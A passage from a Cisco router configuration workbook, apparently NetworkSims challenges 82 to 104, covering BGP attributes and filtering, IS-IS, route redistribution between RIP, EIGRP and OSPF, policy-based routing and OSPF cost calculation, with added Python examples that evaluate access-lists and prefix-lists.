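    return [a for a in as_path if is_private_as(a)]


if __name__ == "__main__":
    # Route learned from the customer in private AS 64512 (Challenge 81), sent on to AS 311.
    print(outbound_as_path([64512], 172))                  # [172, 64512]  -> leaks
    print(outbound_as_path([64512], 172, "classic"))       # [172]
    # A path that mixes a private and a public AS: the basic form leaves it alone.
    print(outbound_as_path([64512, 300], 172, "classic"))  # [172, 64512, 300]
    print(outbound_as_path([64512, 300], 172, "all"))      # [172, 300]
    print(outbound_as_path([64512, 300], 172, "replace"))  # [172, 172, 300]
```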
Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 82


Outline
This challenge involves the configuration of BGP for the atomic aggregation attribute.

Objectives


The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define aggregate-address.

Example
# config t
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 300
(config-router)# neighbor 12.12.12.12 remote-as 311
(config-router)# network 160.0.0.0
(config-router)# aggregate-address 160.0.0.0 255.0.0.0

Explanation
The aggregate-address command creates a summary route in the BGP table from the more specific routes it covers. Thus:
(config-router)# aggregate-address 160.0.0.0 255.0.0.0

advertises 160.0.0.0/8 as a single route, carrying the ATOMIC_AGGREGATE attribute to tell other routers that path detail from the component routes has been lost. The aggregate is only generated while at least one more specific route (here 160.0.0.0/16 from the network command) is present in the BGP table, and without the summary-only keyword the more specific routes continue to be advertised alongside it.
Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)


Cisco Router Challenge 83


Outline
This challenge involves the configuration of BGP for a default local-preference.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define the default local-preference.

Example
# config t
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 300
(config-router)# neighbor 12.12.12.12 remote-as 311
(config-router)# network 160.0.0.0
(config-router)# bgp default local-preference 100

Explanation
Local preference is compared between the BGP routers of one AS to choose the exit point for a destination; the higher value wins, and the default is 100. Thus a router configured with:
(config-router)# bgp default local-preference 100

takes precedence over a router in the same AS that learns the same destination and is configured with:
# config t
(config)# router bgp 172
(config-router)# neighbor 1.1.1.1 remote-as 200
(config-router)# neighbor 12.12.12.12 remote-as 311
(config-router)# network 180.0.0.0
(config-router)# bgp default local-preference 50

For a route that both routers learn from their external neighbours, the rest of AS 172 prefers the path through the router with the larger local-preference. The attribute is only carried inside the AS; it is never sent to eBGP neighbours.
Topology


The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 84


Outline
This challenge involves the configuration of BGP for a default local-preference using a
route-map.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define local-preference with a route-map.

Example
# config t
(config)# access-list 1 permit 10.0.0.0 0.0.0.255
(config)# route-map test permit 10
(config-route-map)# match ip address 1
(config-route-map)# set local-preference 14
(config-route-map)# exit
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 300
(config-router)# neighbor 11.11.11.11 route-map test in
(config-router)# network 160.0.0.0

The route-map is applied inbound: local-preference is a value this AS assigns to routes it receives, and since the attribute is never sent to an eBGP neighbour, setting it in an outbound route-map towards 11.11.11.11 would have no effect. Routes matching 10.0.0.0/24 from this neighbour get local-preference 14 and are therefore less preferred than routes with the default of 100. Because of the route-map's implicit deny, routes that do not match access-list 1 are dropped, so a final permit clause without a match statement is needed if the remaining routes should still be accepted.

Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 85


Outline
This challenge involves the configuration of BGP by setting a metric.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define a metric within a route-map.


Example
# config t
(config)# access-list 1 permit 10.0.0.0 0.0.0.255
(config)# route-map test permit 10
(config-route-map)# match ip address 1
(config-route-map)# set metric 14
(config-route-map)# exit
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 300
(config-router)# neighbor 11.11.11.11 route-map test out
(config-router)# network 160.0.0.0

In BGP the metric set here is the MED (multi-exit discriminator): 10.0.0.0/24 is advertised to AS 300 with MED 14, suggesting to that AS which of its entry points into AS 172 to prefer (lower is better). The neighbour is under no obligation to honour it.

Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 86


Outline
This challenge involves the configuration of BGP for a distribution list.

Objectives
The objectives of this challenge are to:


Define BGP.
Define neighbours.
Define a distribution-list.

Example
# config t
(config)# access-list 1 deny 10.0.0.0 0.0.0.255
(config)# access-list 1 permit any
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 111
(config-router)# neighbor 22.33.44.55 remote-as 222
(config-router)# neighbor 11.11.11.11 distribute-list 1 out
(config-router)# network 160.0.0.0

Explanation
A distribute-list filters the routes that are sent to, or accepted from, a neighbour. Thus the commands:
(config-router)# neighbor 11.11.11.11 remote-as 111
(config-router)# neighbor 11.11.11.11 distribute-list 1 out

stop the 10.0.0.0/24 route from being advertised to the neighbour 11.11.11.11, while the neighbour 22.33.44.55 still receives it. In the access-list:
(config)# access-list 1 deny 10.0.0.0 0.0.0.255
(config)# access-list 1 permit any

the permit any is required because every access-list ends with an implicit deny: without it, every route that did not match the first statement would be filtered as well, and the neighbour would receive nothing.
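Added example, not part of the original: a Python evaluator for numbered standard access-lists with IOS wildcard semantics and the implicit deny, applied as an outbound distribute-list to a constructed set of routes. It reproduces the point above by running the same list with and without permit any. The parser covers only the standard-list syntax used in these challenges (any, host, or an address with an optional wildcard); the routes are constructed for the example.

```python
import ipaddress

ANY = ("0.0.0.0", "255.255.255.255")


def parse_standard_acl(lines):
    """Parse 'access-list N {permit|deny} {any | host A | A [wildcard]}' lines.
    Returns {list_number: [(action, base_int, wildcard_int), ...]} in configuration order."""
    acls = {}
    for line in lines:
        tokens = line.split()
        if len(tokens) < 4 or tokens[0] != "access-list":
            raise ValueError(f"not a standard access-list line: {line!r}")
        number, action = int(tokens[1]), tokens[2]
        if action not in ("permit", "deny"):
            raise ValueError(f"bad action in {line!r}")
        if tokens[3] == "any":
            base, wildcard = ANY
        elif tokens[3] == "host":
            base, wildcard = tokens[4], "0.0.0.0"
        else:
            base = tokens[3]
            wildcard = tokens[4] if len(tokens) > 4 else "0.0.0.0"  # no wildcard means one host
        acls.setdefault(number, []).append(
            (action, int(ipaddress.ip_address(base)), int(ipaddress.ip_address(wildcard))))
    return acls


def wildcard_match(address, base, wildcard):
    """IOS wildcard semantics: a 0 bit in the wildcard must match, a 1 bit is ignored."""
    care = ~wildcard & 0xFFFFFFFF
    return ((int(ipaddress.ip_address(address)) ^ base) & care) == 0


def acl_action(entries, address):
    """First matching entry wins; every access-list ends with an implicit deny."""
    for action, base, wildcard in entries:
        if wildcard_match(address, base, wildcard):
            return action
    return "deny"


def distribute_list_out(entries, routes):
    """Routes (as 'prefix/len' strings) that survive 'distribute-list N out'.
    A standard access-list is tested against the network address of each route."""
    return [r for r in routes
            if acl_action(entries, str(ipaddress.ip_network(r).network_address)) == "permit"]


if __name__ == "__main__":
    routes = ["10.0.0.0/24", "10.0.1.0/24", "160.0.0.0/16"]  # constructed BGP table
    full = parse_standard_acl(["access-list 1 deny 10.0.0.0 0.0.0.255",
                               "access-list 1 permit any"])[1]
    print(distribute_list_out(full, routes))       # ['10.0.1.0/24', '160.0.0.0/16']
    truncated = parse_standard_acl(["access-list 1 deny 10.0.0.0 0.0.0.255"])[1]
    print(distribute_list_out(truncated, routes))  # []  the implicit deny filtered everything
```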

Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.


(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 87


Outline
This challenge involves the configuration of BGP for a distribution list.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define a distribution-list.

Example
# config t
(config)# access-list 103 permit ip 10.0.0.0 0.0.0.255 20.0.0.0 0.0.0.255
(config)# access-list 103 deny ip 20.0.0.0 0.0.0.255 30.0.0.0 0.0.0.255
(config)# access-list 103 permit ip any any
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 111
(config-router)# neighbor 22.33.44.55 remote-as 222
(config-router)# neighbor 11.11.11.11 distribute-list 103 out
(config-router)# network 160.0.0.0

Explanation
When an extended access-list is used as a BGP distribute-list, the source part of each entry is matched against the prefix and the destination part against its mask, so 20.0.0.0 0.0.0.255 in the first line is read as a mask pattern rather than as a destination network. For filtering on prefix and prefix length, the ip prefix-list of the next challenge is clearer and is the usual choice.


Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 88


Outline
This challenge involves the configuration of BGP using an ip prefix-list configuration.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define an ip prefix-list.

Example


# config t
(config)# ip prefix-list test deny 0.0.0.0/0
(config)# ip prefix-list test permit 172.16.0.0/16
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 111
(config-router)# neighbor 22.33.44.55 remote-as 222
(config-router)# neighbor 11.11.11.11 prefix-list test out
(config-router)# network 160.0.0.0
(config-router)# exit
(config)# exit
# sh ip prefix-list
ip prefix-list test: 2 entries
seq 5 deny 0.0.0.0/0
seq 10 permit 172.16.0.0/16

Explanation
An ip prefix-list is the preferred alternative to an access-list for route filtering: it matches on the prefix and its length (with the ge and le options), lookups are faster, and entries carry sequence numbers so that a list can be edited in place. Note that the entry deny 0.0.0.0/0 matches only the default route itself; to deny every prefix the entry would have to be deny 0.0.0.0/0 le 32. With the implicit deny at the end of the list, the list above advertises nothing but 172.16.0.0/16 to 11.11.11.11, and a more specific route such as 172.16.1.0/24 is not matched by the permit entry.
Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)

Cisco Router Challenge 89


Outline
This challenge involves the configuration of BGP using an ip prefix-list configuration.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define an ip prefix-list.

Example
# config t
(config)# ip prefix-list test permit 192.0.0.0/8 le 24
(config)# ip prefix-list test deny 192.0.0.0/8 ge 25
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 111
(config-router)# neighbor 22.33.44.55 remote-as 222
(config-router)# neighbor 11.11.11.11 prefix-list test out
(config-router)# network 160.0.0.0
(config-router)# exit
(config)# exit
# sh ip prefix-list
ip prefix-list test: 2 entries
seq 5 permit 192.0.0.0/8 le 24
seq 10 deny 192.0.0.0/8 ge 25

Explanation
With ip prefix-list, ge and le specify the range of prefix lengths that match; the address/length part identifies the block that a candidate route must fall within. Thus:
(config)# ip prefix-list test permit 192.0.0.0/8 le 24
(config)# ip prefix-list test deny 192.0.0.0/8 ge 25

permits any route inside 192.0.0.0/8 whose prefix length is from 8 to 24, for example:

192.0.0.0/8
192.0.0.0/9
..
192.168.1.0/24

and denies any route inside 192.0.0.0/8 whose prefix length is from 25 to 32, for example:

192.168.1.0/25
192.168.1.128/26
..
192.168.1.1/32

Without ge or le, an entry matches only the exact prefix and length given. The deny entry here is redundant, since the list ends with an implicit deny, but it documents the intent. Notice:
# sh ip prefix-list
ip prefix-list test: 2 entries
seq 5 permit 192.0.0.0/8 le 24
seq 10 deny 192.0.0.0/8 ge 25

where the sequence numbers are assigned automatically in steps of five, and the entries are evaluated in sequence order, from the lowest to the highest, stopping at the first match.
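Added example (not the page's code): a Python implementation of prefix-list evaluation that covers both Challenge 88 and this one: parsing with automatic sequence numbers, the ge/le length range, first-match evaluation with the implicit deny, and a rendering of the show ip prefix-list output. The lists, the candidate routes and the auto-numbering rule (highest existing sequence plus 5) are assumptions for the example; IOS additionally rejects ge or le values that are not greater than the prefix length, which the parser enforces.

```python
import ipaddress


def parse_prefix_list(lines):
    """Parse 'ip prefix-list NAME [seq N] {permit|deny} A.B.C.D/len [ge G] [le L]'.
    Returns {name: [entry, ...]} sorted by sequence number. A missing sequence
    number is assigned as the current highest plus 5 (5 for the first entry)."""
    lists = {}
    for line in lines:
        t = line.split()
        if t[:2] != ["ip", "prefix-list"]:
            raise ValueError(f"not a prefix-list line: {line!r}")
        name, i = t[2], 3
        entries = lists.setdefault(name, [])
        if t[i] == "seq":
            seq, i = int(t[i + 1]), i + 2
        else:
            seq = max((e["seq"] for e in entries), default=0) + 5
        action, prefix, i = t[i], ipaddress.ip_network(t[i + 1]), i + 2
        if action not in ("permit", "deny"):
            raise ValueError(f"bad action in {line!r}")
        ge = le = None
        while i < len(t):
            if t[i] == "ge":
                ge = int(t[i + 1])
            elif t[i] == "le":
                le = int(t[i + 1])
            else:
                raise ValueError(f"unexpected token {t[i]!r} in {line!r}")
            i += 2
        length = prefix.prefixlen
        # Length range: no ge/le -> exactly len; ge only -> ge..32; le only -> len..le.
        lo = ge if ge is not None else length
        hi = le if le is not None else (prefix.max_prefixlen if ge is not None else length)
        if ((ge is not None and ge <= length) or (le is not None and le <= length)
                or lo > hi or hi > prefix.max_prefixlen):
            raise ValueError(f"% Invalid prefix range for {line!r}")
        entries.append({"seq": seq, "action": action, "prefix": prefix,
                        "ge": ge, "le": le, "lo": lo, "hi": hi})
        entries.sort(key=lambda e: e["seq"])
    return lists


def matches(entry, route):
    """A candidate route matches when it lies inside the entry's block and its
    prefix length is within the entry's [lo, hi] range."""
    return (route.network_address in entry["prefix"]
            and entry["lo"] <= route.prefixlen <= entry["hi"])


def prefix_list_action(entries, route):
    """First matching entry decides; an unmatched route hits the implicit deny."""
    route = ipaddress.ip_network(route)
    for entry in entries:
        if matches(entry, route):
            return entry["action"]
    return "deny"


def show_ip_prefix_list(name, entries):
    """Text in the form of the 'show ip prefix-list' output for one list."""
    lines = [f"ip prefix-list {name}: {len(entries)} entries"]
    for e in entries:
        text = f"seq {e['seq']} {e['action']} {e['prefix']}"
        if e["ge"] is not None:
            text += f" ge {e['ge']}"
        if e["le"] is not None:
            text += f" le {e['le']}"
        lines.append(text)
    return lines


if __name__ == "__main__":
    lists = parse_prefix_list([
        "ip prefix-list test permit 192.0.0.0/8 le 24",
        "ip prefix-list test deny 192.0.0.0/8 ge 25",
        "ip prefix-list filt deny 0.0.0.0/0",
        "ip prefix-list filt permit 172.16.0.0/16",
    ])
    print("\n".join(show_ip_prefix_list("test", lists["test"])))
    for r in ("192.168.1.0/24", "192.168.1.128/25", "10.0.0.0/8"):
        print(r, prefix_list_action(lists["test"], r))
    # deny 0.0.0.0/0 matches only the default route, and the /16 permit does not cover a /24
    for r in ("0.0.0.0/0", "172.16.0.0/16", "172.16.1.0/24"):
        print(r, prefix_list_action(lists["filt"], r))
```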
Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)


Cisco Router Challenge 90


Outline
This challenge involves the configuration of BGP for default-originate.

Objectives
The objectives of this challenge are to:

Define BGP.
Define neighbours.
Define the default-originate.

Example
# config t
(config)# router bgp 172
(config-router)# neighbor 11.11.11.11 remote-as 111
(config-router)# neighbor 22.33.44.55 remote-as 222
(config-router)# neighbor 11.11.11.11 default-originate
(config-router)# network 160.0.0.0

Explanation
default-originate advertises a default route (0.0.0.0/0) to the neighbour 11.11.11.11 only; 22.33.44.55 does not receive it. The default route does not need to exist in the local routing table, which makes this the usual way for a provider to hand a customer a default without carrying one inside its own network.

Topology
The basic topology is defined below, where AS1 is connected to E0, AS2 to S0, and AS3 to
S1.

(Figure: Neighbor1 in AS1 on e0, Neighbor2 in AS2 on s0, Neighbor3 in AS3 on s1)


Cisco Router Challenge 91


Outline
This challenge involves the configuration of IS-IS.

Objectives
The objectives of this challenge are to:

Define IS-IS.
Define the NET.
Apply IS-IS on the interfaces.

Example
# config t
(config)# router isis
(config-router)# net 49.0001.0000.0000.000a.00
(config-router)# passive-interface loopback2
(config-router)# is-type level-1
(config-router)# exit
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# ip router isis
(config-if)# int s0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shutdown
(config-if)# ip router isis
(config-if)# int s1
(config-if)# ip address 192.168.2.1 255.255.255.0
(config-if)# no shutdown
(config-if)# ip router isis
(config-if)# int loopback 2
(config-if)# ip address 192.168.3.1 255.255.255.0

Cisco Router Challenge 92


Outline
This challenge involves the configuration of route redistribution for static routes.

Objectives
The objectives of this challenge are to:

Define RIP.
Define redistribution of static routes.
Define the passive interface.
Define static routes.
Define the default route.

Example
# config t
(config)# router rip
(config-router)# network 192.168.0.0
(config-router)# passive-interface bri0
(config-router)# redistribute static
(config-router)# exit
(config)# ip route 172.168.0.0 255.255.255.0 bri0
(config)# ip route 0.0.0.0 0.0.0.0 bri0
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# int s0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shutdown

A passive interface is typically used on a dial-up connection, where the periodic RIP updates would otherwise keep bringing the link up. For example, in Figure 1 the highlighted device is set up with a static route to the destination network. This route is redistributed into RIP and sent to the other devices, but not to the device connected over the BRI, as that is a passive interface and the link is already covered by the static route. Note that passive-interface stops RIP updates from being sent on bri0 but still accepts any that arrive on it.
# config t
(config)# router rip
(config-router)# network 192.168.0.0
(config-router)# passive-interface bri0
(config-router)# redistribute static
(config-router)# exit
(config)# ip route 172.168.0.0 255.255.255.0 10.0.0.1
(config)# ip route 0.0.0.0 0.0.0.0 bri0
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# int s0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shutdown

Figure 1: router 192.168.0.1 and router 192.168.0.2 connected over their bri0 interfaces; the static route to 172.168.0.0/24 is redistributed into RIP.


Cisco Router Challenge 93


Outline
This challenge involves the configuration of distribute-lists for RIP in order to define the
routing information that is sent or received.

Objectives
The objectives of this challenge are to:

Define RIP.
Define distribution-list and an associated access-list.

Example
# config t
(config)# router rip
(config-router)# network 192.168.0.0
(config-router)# distribute-list 10 out
(config-router)# exit
(config)# access-list 10 deny 10.0.1.0 0.0.0.255
(config)# access-list 10 permit any

Explanation
The distribute-list is used to define the routing information that a device sends or receives.
For example:
(config-router)# distribute-list 10 out
(config-router)# exit
(config)# access-list 10 deny 10.0.1.0 0.0.0.255
(config)# access-list 10 permit any

defines that all the routing information relating to 10.0.1.0/24 will be removed from any
outgoing routing information.

Cisco Router Challenge 94


Outline
This challenge involves the configuration of distribute-lists for RIP in order to define the
routing information that is sent or received on a given interface.

Objectives
The objectives of this challenge are to:

Define RIP.
Define distribution-list for S0, and an associated access-list.

Example
# config t
(config)# int s0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# router rip
(config-router)# network 192.168.0.0
(config-router)# distribute-list 10 out s0
(config-router)# exit
(config)# access-list 10 deny 10.0.1.0 0.0.0.255
(config)# access-list 10 permit any

Explanation
The distribute-list is used to define the routing information that a device sends or receives.
For example:
(config-router)# distribute-list 10 out s0
(config-router)# exit
(config)# access-list 10 deny 10.0.1.0 0.0.0.255
(config)# access-list 10 permit any

defines that all the routing information relating to 10.0.1.0/24 will be removed from any
outgoing routing information on S0.

Cisco Router Challenge 95


Outline
This challenge involves the configuration of a passive interface with EIGRP using a
distribute-list.


Objectives
The objectives of this challenge are to:

Define EIGRP.
Define distribution-list for S0, and an associated access-list.

Example
# config t
(config)# router eigrp 128
(config-router)# network 192.168.0.0
(config-router)# distribute-list 10 out s0
(config-router)# exit
(config)# access-list 10 deny any

Explanation
The distribute-list is used to define the routing information that a device sends or receives. For example:
(config-router)# distribute-list 10 out s0
(config-router)# exit
(config)# access-list 10 deny any

defines that no routes at all are advertised out of S0, since the access-list denies everything. S0 therefore behaves like a passive interface as far as routes are concerned; unlike passive-interface, however, EIGRP hellos are still sent on S0, an adjacency with a neighbour on it still forms, and routes from that neighbour are still accepted.

Cisco Router Challenge 96


Outline
This challenge involves the creation of policy-based routing.
Objectives
The objectives of this challenge are to:

Define access-lists for the interesting traffic.
Define route-maps.
Apply the route-maps to the interfaces.

Example
# config t
(config)# access-list 5 permit 192.168.0.0 0.0.0.255
(config)# access-list 10 permit 172.16.0.0 0.0.0.255
(config)# route-map R1 permit 10
(config-route-map)# match ip address 5
(config-route-map)# set interface s0
(config-route-map)# exit
(config)# route-map R2 permit 10
(config-route-map)# match ip address 10
(config-route-map)# set interface s1
(config-route-map)# exit
(config)# int e0
(config-if)# ip policy route-map R1
(config-if)# exit
(config)# int e1
(config-if)# ip policy route-map R2
(config-if)# exit

Explanation
Policy-based routing forwards traffic according to a route-map rather than the routing table, for example by source address. For example:
(config)# access-list 5 permit 192.168.0.0 0.0.0.255
(config)# access-list 10 permit 172.16.0.0 0.0.0.255
(config)# route-map R1 permit 10
(config-route-map)# match ip address 5
(config-route-map)# set interface s0
(config-route-map)# exit
(config)# route-map R2 permit 10
(config-route-map)# match ip address 10
(config-route-map)# set interface s1
(config-route-map)# exit

and:
(config)# int e0
(config-if)# ip policy route-map R1
(config-if)# exit
(config)# int e1
(config-if)# ip policy route-map R2
(config-if)# exit

define that traffic arriving on E0 from a source in 192.168.0.0/24 is sent out S0, and traffic arriving on E1 from a source in 172.16.0.0/24 is sent out S1. A standard access-list in match ip address tests the source address, the policy only applies to packets entering the interface it is configured on, and packets that match no clause of the route-map fall through to normal destination-based routing.

Cisco Router Challenge 97


Outline


This challenge involves the configuration of two-way route redistribution.


Objectives
The objectives of this challenge are to:

Define RIP.
Define redistribution for RIP.
Define EIGRP.
Define redistribution for EIGRP.

Example
# config t
(config)# router rip
(config-router)# network 10.0.0.0
(config-router)# redistribute eigrp 33 metric 2
(config-router)# exit
(config)# router eigrp 33
(config-router)# network 20.0.0.0
(config-router)# redistribute rip metric 10000 100 255 1 1500

The metric given to RIP is a hop count; the five EIGRP values are bandwidth (kbit/s), delay (tens of microseconds), reliability, load and MTU, and without a metric EIGRP does not install redistributed RIP routes. Redistributing in both directions can feed a route back into the protocol it came from, so in practice a distribute-list or route-map is attached to each redistribute command to stop routes from being re-advertised into their original domain.

Cisco Router Challenge 98


Outline
This challenge involves the configuration of the redistribution of connected routes.
Objectives
The objectives of this challenge are to:

Define RIP.
Define redistribution for RIP.
Define EIGRP.
Define redistribution for EIGRP.

Example
# config t
(config)# router rip
(config-router)# network 10.0.0.0
(config-router)# redistribute eigrp 33 metric 2
(config-router)# exit
(config)# router eigrp 33
(config-router)# network 20.0.0.0
(config-router)# redistribute connected metric 10000 100 255 1 1500

redistribute connected injects the subnets of the router's own interfaces that are not already covered by a network statement, which is the usual way to advertise a directly attached segment without running the routing protocol on it.

Cisco Router Challenge 99


Outline
This challenge involves the configuration of the redistribution of routes using the default-metric command.
Objectives
The objectives of this challenge are to:

Define RIP.
Define redistribution for RIP.
Define EIGRP.
Define redistribution for EIGRP.

Example
# config t
(config)# router rip
(config-router)# network 10.0.0.0
(config-router)# redistribute eigrp 33
(config-router)# redistribute connected
(config-router)# default-metric 2
(config-router)# exit
(config)# router eigrp 33
(config-router)# network 20.0.0.0
(config-router)# redistribute rip
(config-router)# redistribute static
(config-router)# default-metric 10000 100 255 1 1500

default-metric supplies the seed metric for every redistribute command in the process that does not carry its own metric option.

Cisco Router Challenge 100


Outline
This challenge involves the configuration of the redistribution of routes.


Objectives
The objectives of this challenge are to:

Define RIP.
Define redistribution for RIP.
Define OSPF.
Define redistribution for OSPF.

Example
# config t
(config)# router rip
(config-router)# passive-interface s0
(config-router)# passive-interface s1
(config-router)# exit
(config)# router ospf 33
(config-router)# network 20.0.0.0 0.255.255.255 area 0
(config-router)# network 30.0.0.0 0.255.255.255 area 0
(config-router)# redistribute rip subnets

Explanation
The following stops RIP from sending updates on the interfaces that face the OSPF routers:
(config)# router rip
(config-router)# passive-interface s0
(config-router)# passive-interface s1

and the following redistributes all the RIP routes, subnets included, into OSPF:
(config)# router ospf 33
(config-router)# network 20.0.0.0 0.255.255.255 area 0
(config-router)# network 30.0.0.0 0.255.255.255 area 0
(config-router)# redistribute rip subnets

The OSPF network statement takes a wildcard mask (0.255.255.255 covers the whole classful network) followed by the area. Without the subnets keyword, OSPF redistributes only routes that fall on classful network boundaries (the default), so any subnetted RIP routes would be silently left out.


(Figure: S0 and S1 connect into OSPF Area 0)

Cisco Router Challenge 101


Outline
This challenge involves the configuration of the redistribution of routes for a limited range
of networks.
Objectives
The objectives of this challenge are to:

Define RIP.
Define redistribution for RIP.
Define OSPF.
Define redistribution for OSPF.

Example
# config t
(config)# access-list 10 permit 172.16.0.0 0.0.15.255
(config)# access-list 10 deny any
(config)# router rip
(config-router)# passive-interface s0
(config-router)# passive-interface s1
(config-router)# exit
(config)# router ospf 33
(config-router)# redistribute rip subnets
(config-router)# distribute-list 10 out rip

Explanation
The access-list of:
(config)# access-list 10 permit 172.16.0.0 0.0.15.255
(config)# access-list 10 deny any

along with:
(config-router)# distribute-list 10 out rip

allows only the networks 172.16.0.0/24 to 172.16.15.0/24 (the block 172.16.0.0/20) to be redistributed from RIP into OSPF; the wildcard 0.0.15.255 ignores the low four bits of the third octet. The out keyword with a source protocol is how redistribution is filtered under router ospf (an in distribute-list would instead filter what OSPF installs in the routing table), and the closing deny any is redundant with the implicit deny but makes the intent explicit.

(Figure: S0 and S1 connect into OSPF Area 0)

Cisco Router Challenge 102


Outline
This challenge involves the configuration of the redistribution of routes for OSPF.
Objectives
The objectives of this challenge are to:

Define RIP.
Define redistribution for RIP.
Define OSPF.
Define redistribution for OSPF.

Example
# config t
(config)# access-list 10 permit 172.16.1.0 0.0.0.255
(config)# access-list 10 deny any
(config)# router rip
(config-router)# passive-interface s0
(config-router)# passive-interface s1
(config-router)# exit
(config)# router ospf 33
(config-router)# area 1 range 192.168.1.0 255.255.255.0

area range takes a subnet mask rather than a wildcard. Configured on the area border router, it advertises the networks of area 1 that fall inside 192.168.1.0/24 into the other areas as one summary route instead of individually.

Cisco Router Challenge 103


Outline
This challenge involves the configuration of OSPF costs.
Objectives
The objectives of this challenge are to:

Define OSPF.
Define OSPF costs for S0 and S1.
Define bandwidth requirements on S0 and S1.

Example
# config t
(config)# int s0
(config-if)# ip ospf cost 64
(config-if)# bandwidth 100
(config-if)# exit
(config)# int s1
(config-if)# ip ospf cost 64
(config-if)# bandwidth 100
(config-if)# exit
(config)# router ospf 33
(config-router)# network 20.0.0.0 0.255.255.255 area 0
(config-router)# network 30.0.0.0 0.255.255.255 area 0

Explanation
With OSPF costs are used to determine the best route. This value for an interface, for Cisco
IOS, is:
100,000,000/bandwidth
Thus a 56kbps link has a cost fo 100,000,000/56,000 which is 1,785. A new cost can be defined
with the following:
(config)# int s0
(config-if)# ip ospf cost 64

NetworkSims.com

80

(config-if)# bandwidth 100


(config-if)# exit

which defines a cost of 64 on S0 (where 64 is equivalent to a T1 stream 1.544MBps). The


cost value can thus be used to determine the most desirable route. Along with this the
bandwidth value must be properly set, as most devices will default to a T1 bandwidth.
Tutorial
Complete the following table:

Interface medium            Cost
56kbps serial connection    1785
T1 link (1.544Mbps)
E1 link (2.048Mbps)
Ethernet (10Mbps)
Fast Ethernet (100Mbps)
4Mbps Token Ring
16Mbps Token Ring

Cisco Router Challenge 104


Outline
This challenge involves the configuration of OSPF costs for Gigabit Ethernet links.
Objectives
The objectives of this challenge are to:

Define OSPF.
Define OSPF costs for S0 and S1.
Define bandwidth requirements on S0 and S1.
Define the reference bandwidth.

Example
# config t
(config)# int s0
(config-if)# ip ospf cost 64
(config-if)# bandwidth 100
(config-if)# exit
(config)# int s1
(config-if)# ip ospf cost 64
(config-if)# bandwidth 100
(config-if)# exit
(config)# router ospf 33
(config-router)# network 20.0.0.0 0.255.255.255 area 0
(config-router)# network 30.0.0.0 0.255.255.255 area 0
(config-router)# auto-cost reference-bandwidth 1000

Explanation
With OSPF, costs are used to determine the best route. For Cisco IOS the default cost of an
interface is:
reference bandwidth / bandwidth
where the reference bandwidth defaults to 100,000,000 bps, which gives:
Interface medium               Cost
56kbps serial connection       1785
T1 link (1.544Mbps)            64
E1 link (2.048Mbps)            48
Ethernet (10Mbps)              10
Fast Ethernet (100Mbps)        1
4Mbps Token Ring               25
16Mbps Token Ring              6

These costs work well up to 100 Mbps, but not for bandwidths above this, such as Gigabit
Ethernet, which is also truncated to the minimum cost of 1 and so cannot be distinguished from
Fast Ethernet. To adjust the reference bandwidth the auto-cost command is used, such as:
(config-router)# auto-cost reference-bandwidth 1000

which sets the reference bandwidth to 1,000 Mbps (1,000,000,000 bps). The value is given in
Mbps and must be configured identically on every router in the OSPF domain; otherwise routers
compute different costs for the same link type and may choose inconsistent paths.
